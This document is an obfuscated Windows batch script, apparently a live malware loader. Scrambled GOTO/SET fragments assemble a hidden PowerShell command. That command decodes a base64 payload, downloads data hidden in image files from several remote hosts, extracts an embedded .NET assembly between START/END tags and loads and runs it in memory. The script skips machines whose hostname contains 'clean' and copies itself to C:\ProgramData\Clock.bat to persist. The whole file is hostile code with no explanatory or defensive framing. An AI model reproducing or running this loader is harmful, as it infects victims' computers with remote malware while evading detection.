@echo off
GOTO DDDFOFOGKN
:IUJNNFJONO
SET OIOIGIFGDO=AYwB0AFsAXQBdACAAKAAkAGcAZwBnACAAIAAsACAAJABzAHQAcg
GOTO DIDGDDIDIF
:IOGDFIFIKG
SET DGFIUJIGSS=BuAHUAbABsAAoAf@QAKACQAcwBjAGgAZQBtAGUAMQAgAD0AIAAnAGgAdAB0ACcACgAkAH
GOTO UIHOSDDIOF7
:ONGINSGIGS
SET DGGGDIOIHG=ACcAKQAKACkACgAKACQAcgBhAHcARABhAHQAYQAgAD0AIABHAGUAdAAtAFIAZQBtAG8AdABlAEQAYQB0AGE
GOTO GGOSDGGOFG6
:DININDIDGO
SET DNDSNSOJGU=AAgACAAIAAgACAAIAAgAHQAcgB5ACAAewAgAHIAZQB0AHUAcgBuACAAJABjAGwAaQBlAG4Ad
GOTO UIHOSDDIOF4
:DIDGDDIDIF
SET HDGJNJFNKG=AsACAAJwBDAGwAbwBjAGsAJwAsACAAJABpAG4AagBWAGEAbAB1AGUALAAgACcAMAAnACwA
GOTO JGDDGGFKGG
:NGGISUGGDJ
SET SODGGDDONH=QBwAHIAbwBnAHIAYQBtAC4ASABvAG0AZQBlAHMAJwApAAoAIAAgACAAIAAgACAAI
GOTO ODFNJDIOKU
:IJGONGGIDG
SET NGNDFINUDK=EAcgB0AFAAbwBzACkAIAB7AAoAIAAgACAAIAAgACAAIAAgACQAcw
GOTO GFNOHHNFDD8
:GOJNUSDNDO
SET OHGNGJKODI=AGQAZQB4AE8AZgAoACQAZQBuAGQAVABhAGcAKQAKAAoAIAAgACAAIABpAGYAIAAoACQAcwB0AGEAcgB0AFAAbwBzACAAL
GOTO IJGDFFDGGI
:JGDNGSGIOF
SET OGGFJJGFDI=BbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQA
GOTO GGOSDGGOFG9
:UIHOSDDIOF
SET DGOGIFIGSJ=shell.exe -Command "Start-Process $env:SystemRoot\System32\WindowsPowerShell\v1.0\powersh
GOTO GGOSDGGOFG
:GGOSDGGOFG
SET SDNIOGNNGJ=ell.exe -WindowStyle Hidden -ArgumentList '-Command \"$jghjggghhjg = 
GOTO GFNOHHNFDD
:UIHOSDDIOF8
SET DODSSOJJGS=IAA9ACAAJABzAGMAaABlAG0AZQAxACAAKwAgACQAcwBjAGgAZQBt
GOTO UIHOSDDIOF9
:GGOSDGGOFG3
SET FHDIOSOGFF=rAGkAegB6AHkALwBjAGgALgBqAHAAZwAnACkALAAKACAAIAAgACAAKAAkAGIAYQBzAGUAVQByAGwAIAArACAAJwAxADAANwAu
GOTO GGOSDGGOFG4
:JGDDGGFKGG
SET GDNDGOFUDU=IAAnAHgAOAA2ACcAKQAKACAAIAAgACAAIAAgACAAIAApAAoAIAAgACAAIAB9AAoAf@QA='';$oWgj
GOTO OOUIDDNDNU
:ODFNJDIOKU
SET SGNINDUSNG=AAKACAAIAAgACAAIAAgACAAIAAkAGkAbgBqAFYAYQBsAHUAZQAgAD0AIAAnAE0AcwBCAHUAaQBsAG
GOTO GIJUIJOIFF2
:GGOSDGGOFG1
SET IIFGKIIJDG=QByAGwAcwAgAD0AIABAACgACgAgACAAIAAgACgAJABiAGEAcwBlAFUAcgBsACAAKwAg
GOTO GGOSDGGOFG2
:DJGFKFJOOD
SET IGNOOFOFND=YQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAAgAD0AIABbAE4AZQB0AC4AUwBlAG
GOTO GIJUIJOIFF
:DJGFKFJOOD3
SET OFIGJFUJOD=ACAAIAAgACAAIAAgACAAIAAkAGEAcwBzAGUAbQBiAGwAeQBCAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0
GOTO DJGFKFJOOD4
:FFDNJFGDOJ
SET OOIOIOGNOG=AHgAdABDAG8AbgB0AGUAbgB0AC4ASQBuAGQAZQB4AE8AZgAoACQAcwB0AGEAcgB0AFQAYQBnACkACgAgACAAIAAgACQAZQ
GOTO GFNOHHNFDD4
:GGOSDGGOFG2
SET UOINGDNGJJ=ACcAcwBpAGcAbgBhAGcAZQBpAG4AcwBpAGcAbgBpAGEALgBjAG8ALgB6AGEALwB
GOTO GGOSDGGOFG3
:DJGFKFJOOD2
SET IFJFSFUJFU=AG4AZwAoACQAcwB0AGEAcgB0AFAAbwBzACwAIAAkAGIAYQBzAGUANgA0AEwAZQBuAGcAdABoACkACgAK
GOTO DJGFKFJOOD3
:NNSOHSHIIG
SET NIUFSGGOSN=AgACAAcABhAHIAYQBtACAAKABbAHMAdAByAGkAbgBnAFsAXQBdACQAdQByAGwAcwApAAoAIAAg
GOTO IFOFOKJFIK
:UIHOSDDIOF1
SET DUODGHOGDN=wBvAHUAbgB0ACAAJAB1AHIAbABzAC4ATABlAG4AZwB0AGgACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAd
GOTO UIHOSDDIOF2
:GIJUIJOIFF
SET DSOIJGOISG=MAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbABUAHkAcABlAF0AOgA6AFQAbABzADEAMgAKAA
GOTO IDGONNHFHI
:GGOSDGGOFG6
SET KJDFGDODII=AIAAkAHQAYQByAGcAZQB0AFUAcgBsAHMACgBpAGYAIAAoACQAcgBhAHcARABhAHQAY
GOTO GGOSDGGOFG7
:DDDFOFOGKN
SET JUNIDGNNDF=%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\power
GOTO UIHOSDDIOF
:UIHOSDDIOF4
SET KIJNGIGOGI=AAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJAB1ACkAIAB9ACAAYwB
GOTO UIHOSDDIOF5
:GIJUIJOIFF5
SET GGFISHNGGI=OAA4ADUAaQByAHUAeQAvAG0AbwBjAC4AYgB1AGgAdABpAGcALwAvADoAcwAgAGcAcwBmAGgAagBnAGYAcwBnAGYAJwAgADsAIAAk
GOTO GIJUIJOIFF6
:GIJUIJOIFF4
SET DDOGGIDIUD=BuAGkAYQBtAC8AcwBkAGEAZQBoAC8AcwBmAGUAcgAvAHcAYQByAC8AMQAzADcAMwA3ADMAMwBwAGMAdgAvADMA
GOTO GIJUIJOIFF5
:IFOFOKJFIK
SET SUIDKGIDJS=ACAAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUA
GOTO NIGOJINGFS
:IJGDFFDGGI
SET SFDDDJIOFO=QBnAGUAIAAwACAALQBhAG4AZAAgACQAZQBuAGQAUABvAHMAIAAtAGcAdAAgACQAcwB0AG
GOTO IJGONGGIDG
:DJGFKFJOOD9
SET SGDOGDDGDF=AJABsAG8AYQBkAGUAZABBAHMAbQAuAEcAZQB0AFQAeQBwAGUAKAAnAG0Ae
GOTO NGGISUGGDJ
:GFNOHHNFDD
SET OONJFDJFFK=''WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0A
GOTO DJGFKFJOOD
:IONJIGFFJF
SET ONKKNDGDII= [regex]::replace^($jghjggghhjg, ''f@'',''f''^)^)^);iex $oWgjffu
GOTO IDGONNHFHI5
:GIJUIJOIFF8
SET IDHJDISOKO=QB0AFQAeQBwAGUALgBHAGUAdABNAGUAdABoAG8AZAAoACcAcgB1AG4AJwAgACsAIAAnAHMAcwAnACkALgBJAG4AdgBvAGsAZQAoA
GOTO GIJUIJOIFF9
:NIGOJINGFS
SET OSFJFJGGFN=bQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQACgAgACAAIAAgACQAcgBhAG4AZABvAG0ATwByAGQAZQByACAAPQAgAEcAZQB
GOTO UIHOSDDIOF0
:GFNOHHNFDD2
SET GSGNKDJDFS=EAD4APgAnAAoACgAgACAAIAAgACQAcwB0AGEAcgB0AFAAbwBzACAAPQAgACQAdABl
GOTO FFDNJFGDOJ
:GGOSDGGOFG4
SET ODFSJGFDGJ=ADEANwAzAC4AMgAyADcALgAxADIANgAvAGkAbQBnAC8AMQAuAGoAcABn
GOTO ONGINSGIGS
:UIHOSDDIOF9
SET OFNGSOSNNS=AGUAMgAKAGkAZgAgACgAKABoAG8AcwB0AG4AYQBtAGUAKQAgAC0AbABpAGsAZQAgACcAKgBjAGwAZQB
GOTO GGOSDGGOFG0
:GIJUIJOIFF6
SET JDNDKFNGON=AGcAZwBnACAAPQAgACQAZwBnAGcALgBTAHUAYgBzAHQAcgBpAG4AZwAoADAALAAgACQAZwBnAGcALgB
GOTO GIJUIJOIFF7
:UIHOSDDIOF5
SET GNFFJNOFSJ=hAHQAYwBoACAAewAgAGMAbwBuAHQAaQBuAHUAZQAgAH0ACgAgACAAIAAgAH0ACgAgACAAIAAgAHIAZQB0AHUAcgBuACAAJA
GOTO IOGDFIFIKG
:DJGFKFJOOD0
SET FJUNODFUKJ=dABoACAAPQAgACQAZQBuAGQAUABvAHMAIAAtACAAJABzAHQAYQByAHQAUABvAHMACgAgACAAIAAgACAAIAAgAC
GOTO DJGFKFJOOD1
:HFKNDIFJHS
%JUNIDGNNDF%%DGOGIFIGSJ%%SDNIOGNNGJ%%OONJFDJFFK%%IGNOOFOFND%%DSOIJGOISG%%JOIGSGDNDD%%NIUFSGGOSN%%SUIDKGIDJS%%OSFJFJGGFN%%GOINOOIIGO%%DUODGHOGDN%%DFIGSIHGII%%DNDSNSOJGU%%KIJNGIGOGI%%GNFFJNOFSJ%%DGFIUJIGSS%%UNNGGDIFJS%%DODSSOJJGS%%OFNGSOSNNS%%GGGIGKOGOF%%IIFGKIIJDG%%UOINGDNGJJ%%FHDIOSOGFF%%ODFSJGFDGJ%%DGGGDIOIHG%%KJDFGDODII%%OGDDFIDOOS%%OGGFJJGFDI%%JDOGJDNNFH%%FGDJNIINJG%%SNIIGDINGG%%GSGNKDJDFS%%OOIOIOGNOG%%FHDOOGJGDD%%OHGNGJKODI%%SFDDDJIOFO%%NGNDFINUDK%%GJDKIHODHD%%NFGSFDFIFO%%FJUNODFUKJ%%ISDJGGGNGD%%IFJFSFUJFU%%OFIGJFUJOD%%FOGUIGDJDJ%%DOUDIKGHJJ%%DONDHJFIJG%%IIDIGGOFDD%%GGFDOIFFJK%%SGDOGDDGDF%%SODGGDDONH%%SGNINDUSNG%%SODKDGHSIJ%%KONSGDJGGD%%DDOGGIDIUD%%GGFISHNGGI%%JDNDKFNGON%%IINUFJNFSJ%%IDHJDISOKO%%SGDDNNJIII%%OIOIGIFGDO%%HDGJNJFNKG%%GDNDGOFUDU%%ODDDDNNDOJ%%ONKKNDGDII%%JDDGDGUJGD%%JOFSGGIJHD%
GOTO IDGONNHFHI8
:GFNOHHNFDD8
SET GJDKIHODHD=B0AGEAcgB0AFAAbwBzACAAKwA9ACAAJABzAHQAYQByAHQAVABhA
GOTO GFNOHHNFDD9
:GGOSDGGOFG7
SET OGDDFIDOOS=QAgAC0AbgBlACAAJABuAHUAbABsACkAIAB7AAoAIAAgACAAIAAkAHQAZQB4AHQAQwBvAG4AdABlAG4AdAAgAD0AIA
GOTO JGDNGSGIOF
:OOUIDDNDNU
SET ODDDDNNDOJ=ffuxd = [system.Text.encoding]::Unicode.GetString^([system.convert]::Frombase64string^(
GOTO IONJIGFFJF
:DJGFKFJOOD1
SET ISDJGGGNGD=AAJABiAGEAcwBlADYANABDAGgAdQBuAGsAIAA9ACAAJAB0AGUAeAB0AEMAbwBuAHQAZQBuAHQALgBTAHUAYgBzAHQAcgBp
GOTO DJGFKFJOOD2
:IDGONNHFHI
SET JOIGSGDNDD=oAZgB1AG4AYwB0AGkAbwBuACAARwBlAHQALQBSAGUAbQBvAHQAZQBEAGEAdABhACAAewAKACAAIA
GOTO NNSOHSHIIG
:DJGFKFJOOD6
SET DONDHJFIJG=G8AYQBkAGUAZABBAHMAbQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAd
GOTO DJGFKFJOOD7
:GIJUIJOIFF2
SET SODKDGHSIJ=QAJwAKACAAIAAgACAAIAAgACAAIAAkAHMAdAByACAAPQAgACcAMQAnAAoAIAAgACAAIAAgACAAIAAgACQAZwBnAGc
GOTO GIJUIJOIFF3
:DJGFKFJOOD5
SET DOUDIKGHJJ=MAZQA2ADQAQwBoAHUAbgBrACkACgAgACAAIAAgACAAIAAgACAAJABsA
GOTO DJGFKFJOOD6
:UIHOSDDIOF2
SET DFIGSIHGII=QAgAGkAbgAgACQAcgBhAG4AZABvAG0ATwByAGQAZQByACkAIAB7AAoAI
GOTO DININDIDGO
:DJGFKFJOOD7
SET IIDIGGOFDD=ABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAJAB
GOTO DJGFKFJOOD8
:GFNOHHNFDD1
SET SNIIGDINGG=AgACAAIAAgACQAZQBuAGQAVABhAGcAIAAgACAAPQAgACcAPAA8AEUATgB
GOTO GFNOHHNFDD2
:DJGFKFJOOD8
SET GGFDOIFFJK=hAHMAcwBlAG0AYgBsAHkAQgB5AHQAZQBzACkACgAKACAAIAAgACAAIAAgACAAIAAkAHQAYQByAGcAZQB0AFQAeQBwAGUAIAA9ACA
GOTO DJGFKFJOOD9
:GIJUIJOIFF3
SET KONSGDJGGD=AIAA9ACAAJwB0AHgAdAAuAGQAYQBvAGwAcAB1AHQAcwBvAGgAYwB2AHMALw
GOTO GIJUIJOIFF4
:GGOSDGGOFG0
SET GGGIGKOGOF=hAG4AKgAnACkAIAB7AAoAIAAgACAAIABlAHgAaQB0AAoAf@QAKACQAdABhAHIAZwBlAHQAV
GOTO GGOSDGGOFG1
:GFNOHHNFDD4
SET FHDOOGJGDD=BuAGQAUABvAHMAIAAgACAAPQAgACQAdABlAHgAdABDAG8AbgB0AGUAbgB0AC4ASQBu
GOTO GOJNUSDNDO
:GGOSDGGOFG9
SET JDOGJDNNFH=RgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAHIAYQB3AEQAYQB0AGEAKQAKACAAIAAgACAAJA
GOTO GFNOHHNFDD0
:IDGONNHFHI5
SET JDDGDGUJGD=xd\"'";Copy-Item -Path '%~f0' -Destination 'C:\ProgramData\Clock.bat'
GOTO IDGONNHFHI6
:UIHOSDDIOF0
SET GOINOOIIGO=0AC0AUgBhAG4AZABvAG0AIAAtAEkAbgBwAHUAdABPAGIAagBlAGMAdAAgACQAdQByAGwAcwAgAC0AQ
GOTO UIHOSDDIOF1
:GIJUIJOIFF9
SET SGDDNNJIII=AoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABuAHUAbABsACwACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABbAG8AYgBqAGU
GOTO IUJNNFJONO
:UIHOSDDIOF7
SET UNNGGDIFJS=MAYwBoAGUAbQBlADIAIAA9ACAAJwBwADoALwAvACcACgAkAGIAYQBzAGUAVQByAGwA
GOTO UIHOSDDIOF8
:GIJUIJOIFF7
SET IINUFJNFSJ=MAGUAbgBnAHQAaAAgAC0AIAAxADEAKQAKACAAIAAgACAAIAAgACAAIAAKACAAIAAgACAAIAAgACAAIAAkAHQAYQByAGcAZ
GOTO GIJUIJOIFF8
:GFNOHHNFDD9
SET NFGSFDFIFO=GcALgBMAGUAbgBnAHQAaAAKACAAIAAgACAAIAAgACAAIAAkAGIAYQBzAGUANgA0AEwAZQBuAGcA
GOTO DJGFKFJOOD0
:DJGFKFJOOD4
SET FOGUIGDJDJ=AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYgBhAH
GOTO DJGFKFJOOD5
:IDGONNHFHI6
SET JOFSGGIJHD= -Force -ErrorAction SilentlyContinue"
GOTO HFKNDIFJHS
:GFNOHHNFDD0
SET FGDJNIINJG=BzAHQAYQByAHQAVABhAGcAIAA9ACAAJwA8ADwAUwBUAEEAUgAnACAAKwAnAFQAPgA+ACcACg
GOTO GFNOHHNFDD1
:IDGONNHFHI8